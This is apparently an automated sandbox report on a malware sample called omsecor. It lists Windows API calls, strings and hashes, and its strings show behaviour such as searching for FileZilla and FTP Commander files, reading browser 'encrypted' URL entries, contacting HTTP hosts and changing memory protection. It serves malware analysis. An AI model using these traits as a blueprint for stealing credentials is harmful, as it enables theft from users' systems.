                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                          • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                          • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                          • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                          • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409FCE
                          • GetTickCount.KERNEL32 ref: 00409FDE
                          • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                          • DispatchMessageW.USER32(?), ref: 0040A009
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                          • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409F5B
                          • GetTickCount.KERNEL32 ref: 00409F5F
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                          • DispatchMessageW.USER32(?), ref: 00409F80
                          • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                          • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004097ED
                          • SysAllocString.OLEAUT32(?), ref: 004097FB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "domain"$"url"
                          • API String ID: 2525500382-2438671658
                          • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                          • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                          • CharLowerW.USER32(00408795), ref: 004095D8
                          • SysFreeString.OLEAUT32(00408795), ref: 00409608
                          • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharFreeLowerString
                          • String ID:
                          • API String ID: 2335467167-0
                          • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                          • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 90 4012c0-4012e8 FindFirstFileA call 401080
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,254B559C), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 17 407a98-407a9f GetModuleHandleA 18 407aa1-407ab0 call 407ab5 17->18 19 407adf 17->19 29 407ab2-407abd GetProcAddress 18->29 30 407b17 18->30 20 407ae1-407ae5 19->20 22 407b24 call 407b29 20->22 23 407ae7-407aef GetModuleHandleA 20->23 26 407af1-407af9 23->26 26->26 28 407afb-407afe 26->28 28->20 31 407b00-407b02 28->31 29->19 33 407abf-407acc VirtualProtect 29->33 32 407b18-407b20 30->32 36 407b04-407b06 31->36 37 407b08-407b10 31->37 41 407b22 32->41 34 407ade 33->34 35 407ace-407adc VirtualProtect 33->35 34->19 35->34 39 407b11-407b12 GetProcAddress 36->39 37->39 39->30 41->28
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph

                          • Executed
                          • Not Executed
